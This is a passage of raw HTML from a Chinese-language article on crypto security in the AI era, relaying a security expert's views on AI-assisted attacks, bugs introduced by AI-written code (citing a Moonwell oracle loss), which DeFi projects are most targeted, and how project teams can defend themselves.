sans-serif;line-height: 1.75em;"><strong><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">第一类是攻击者主动利用 AI 作恶。</span></strong><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">这既包括过去两年间已在加密行业内泛滥的社交工程攻击，即通过深度伪造视频、伪造音频在社交媒体上发起远程诈骗；也包括更偏“技术流”的直接攻击方案，即基于公开漏洞样本、真实攻击案例以及利用细节，借助 AI 去训练漏洞发现、漏洞利用的方法论 —— 这不仅限于智能合约领域，任何能够基于历史经验进行训练与实操的安全环节，都可能成为 AI 的用武之地。</span></p><p style="margin-right: 16px;margin-bottom: 16px;margin-left: 16px;text-wrap: wrap;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-size: 16px;font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;"><strong><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">第二类风险当下相对容易被忽视，但却更值得行业警惕 —— 项目方自己在用 AI 开发，却把新的安全问题一起带进了系统。</span></strong><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">随着 AI 编程能力的不断升级，从改进生产力的角度来看，越来越多的项目方开始依赖于 Vibe-Coding 进行代码编写。效率的提升确实肉眼可见，可副作用也同样明显，AI 难免会出现“幻觉”，它可能因为依赖污染、错误安装包、错误代码库引用等问题，把隐患直接写进生产环境。</span></p><p style="margin-right: 16px;margin-bottom: 16px;margin-left: 16px;text-wrap: wrap;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-size: 16px;font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;"><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">这并非危言耸听。今年 2 月，借贷协议 Moonwell 便因预言机喂价公式错误而被盗 178 万美元，而导致公式错误的直接原因便是该项目依赖 Claude Opus 4.6 编写了存在漏洞的代码，cbETH 的价格被错误设置为 1.12 美元，而当时的实际价格应为约 2200 美元。</span></p><p style="margin-right: 16px;margin-bottom: 16px;margin-left: 16px;text-wrap: wrap;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-size: 16px;font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;"><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">在 AI 全方位重塑世界的当下，它不仅仅是黑客手里的武器，同样也可能成为项目方自己“埋雷”的工具。</span></p><p style="margin-right: 16px;margin-bottom: 16px;margin-left: 16px;white-space: normal;max-width: 100%;min-height: 1em;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-size: 16px;font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="letter-spacing: 0.544px;color: rgb(73, 73, 73);font-size: 15px;text-align: start;caret-color: rgb(73, 73, 73);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.0962962962962963" data-type="png" data-w="1080" style="font-size: 16px;letter-spacing: 0.544px;text-align: center;width: 550px;height: 53px;" data-cropselx1="0" data-cropselx2="546" data-cropsely1="0" data-cropsely2="53" src="https://wechat2rss.xlab.app/img-proxy/?k=53a89e02&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FctMhTnwNdoew6gT0icDq3OEn9Srh4ww6RROo4fLzGQhdthObCvEKYrb32Aay9Xa8JJuZcibMpnd8tbcZibaG6whIA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><h2 style="margin-right: 16px;margin-bottom: 16px;margin-left: 16px;white-space: normal;max-width: 100%;min-height: 1em;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-size: 16px;font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;text-align: center;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="" style="letter-spacing: 0.544px;caret-color: rgb(73, 73, 73);color: rgb(85, 148, 45);font-weight: bold;font-size: 16px;text-align: center;">哪些项目最容易成为 AI 时代的猎物？</span></h2><p style="margin-right: 16px;margin-bottom: 16px;margin-left: 16px;text-wrap: wrap;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-size: 16px;font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;"><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">如果说 AI 已经进入攻防双方，那么接下来的问题就很现实，</span><strong><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">谁更容易中枪？</span></strong></p><p style="margin-right: 16px;margin-bottom: 16px;margin-left: 16px;text-wrap: wrap;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-size: 16px;font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;"><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">余弦的判断很直接，</span><strong><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">资金量大的项目，永远是最优先的目标。</span></strong><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">加密行业的特殊性在于，协议之上会直接承载真金白银，且由于去中心化的理念，合约资金状况对外界往往也是透明的。对于攻击者而言，投入和产出比始终是第一原则，因此只要协议上的 TVL 足够大，它天然就会进入重点打击名单，必然会被攻击者持续性研究、扫描与突破。</span></p><p style="margin-right: 16px;margin-bottom: 16px;margin-left: 16px;text-wrap: wrap;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-size: 16px;font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;"><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">除去大资金项目外，</span><strong><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">另一类高危目标，是刚上线不久、漏洞又比较明显的新项目。</span></strong><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);"> 此类项目的资金规模虽然有限，却经常成为“抢跑式攻击”的牺牲品。因为在 AI 的加持下，批量扫描、自动识别、自动利用的链路已经越来越成熟，一些新项目在刚上线不久、资金规模还没完全做大之前，就可能因为明显甚至低级的漏洞，被多支攻击队伍同时盯上。此时比的不是谁更聪明，而是谁更快。谁先下手，谁就可能先拿到收益。</span></p><p style="margin-right: 16px;margin-bottom: 16px;margin-left: 16px;text-wrap: wrap;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-size: 16px;font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;"><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">余弦特别提到，还有一类项目同样值得警惕 —— </span><strong><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">即那些运行时间很久、已经让市场产生“应该没问题了”错觉的老牌协议。</span></strong><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">最典型的例子便是去年老牌协议 Balancer 的“翻车”（可参阅：《老牌DeFi沦陷：Balancer V2合约漏洞，超1.1亿美元资产被盗》(</span><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);"><a href="https://www.odaily.news/zh-CN/post/5207269" target="_blank">https://www.odaily.news/zh-CN/post/5207269</a></span><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">)），很多老牌项目已无事运营多年，也做过了多轮审计</span><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">，团队和用户都容易形成一种“系统已经足够安全”的惯性认知。但现实却是，越是这种“默认安全”的协议，越可能成为某些攻击团伙长期研究、战略性突破的对象，一旦项目方响应变慢、治理流程冗长，甚至恰逢团队休假、注意力下降，被利用后的损失反而可能更加惨重。</span></p><p style="margin-right: 16px;margin-bottom: 16px;margin-left: 16px;white-space: normal;max-width: 100%;min-height: 1em;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-size: 16px;font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="letter-spacing: 0.544px;color: rgb(73, 73, 73);font-size: 15px;text-align: start;caret-color: rgb(73, 73, 73);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.0962962962962963" data-type="png" data-w="1080" style="font-size: 16px;letter-spacing: 0.544px;text-align: center;width: 550px;height: 53px;" data-cropselx1="0" data-cropselx2="546" data-cropsely1="0" data-cropsely2="53" src="https://wechat2rss.xlab.app/img-proxy/?k=53a89e02&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FctMhTnwNdoew6gT0icDq3OEn9Srh4ww6RROo4fLzGQhdthObCvEKYrb32Aay9Xa8JJuZcibMpnd8tbcZibaG6whIA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><h2 style="margin-right: 16px;margin-bottom: 16px;margin-left: 16px;white-space: normal;max-width: 100%;min-height: 1em;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-size: 16px;font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;text-align: center;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="" style="letter-spacing: 0.544px;caret-color: rgb(73, 73, 73);color: rgb(85, 148, 45);font-weight: bold;font-size: 16px;text-align: center;">项目方及用户，分别该如何布防？</span></h2><p style="margin-right: 16px;margin-bottom: 16px;margin-left: 16px;text-wrap: wrap;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-size: 16px;font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;"><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">在对话中，余弦反复强调的一点是，</span><strong><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">项目方应该更主动地拥抱 AI。</span></strong><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">原因很简单，外部的攻击者都在用 AI 武装自己，而你如果还停留在“只靠传统人工审计、系统跑了很久应该没事”的思路里，本质上就是在打一场信息差极大的战争。</span></p><p style="margin-right: 16px;margin-bottom: 16px;margin-left: 16px;text-wrap: wrap;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-size: 16px;font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;"><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">从生产力发展的角度来看，</span><strong><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">“用 AI 去写代码”是必然趋势，但问题在于，你不能只想着享受 AI 带来的效率提升，却不愿建立与之匹配的安全流程</span></strong><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);"> —— 越是在研发流程中深度引入 AI，越要在上线前建立更严格的交叉审查与人工把关机制，比如使用多个 AI 模型进行交叉检验，或是让真正有安全经验、懂工程可靠性的角色参与最终审核。</span></p><p style="margin-right: 16px;margin-bottom: 16px;margin-left: 16px;text-wrap: wrap;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-size: 16px;font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;"><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">说白了，就是“</span><strong><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">别躺平，要勤快一点</span></strong><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">”。尤其是那些 TVL 已经很高、协议里沉淀着大量用户资金的项目，更应该主动把当前最强的模型能力、安全团队能力结合起来，围绕现有系统重新做一轮安全策略升级。哪怕不是完全依赖 AI，也至少应该理解你的对手正在用什么工具，你自己又该如何应对。这件事在用户认知方面也会是加分项。一个愿意公开拥抱 AI 安全升级、并持续进行风险复检的项目，至少会让市场知道，它没有把历史成绩当作可以偷懒的资本。</span></p><p style="margin-right: 16px;margin-bottom: 16px;margin-left: 16px;text-wrap: wrap;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);font-size: 16px;font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;"><strong><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Segoe UI&#34;, &#34;Lucida Grande&#34;, Helvetica, Arial, &#34;Microsoft YaHei&#34;, FreeSans, Arimo, &#34;Droid Sans&#34;, &#34;wenquanyi micro hei&#34;, &#34;Hiragino Sans GB&#34;, &#34;Hiragino Sans GB W3&#34;, FontAwesome, sans-serif;line-height: 1.75em;color: rgb(73, 73, 73);font-size: 15px;letter-spacing: 0.544px;text-align: start;caret-color: rgb(73, 73, 73);">相较于还有能力构建体系、投入预算、升级流程的项目方，普通用户在 AI 安全攻防升级面前，处境其实更被动。</span></strong><span leaf="" style="text-wrap: wrap;background-color: rgb(255, 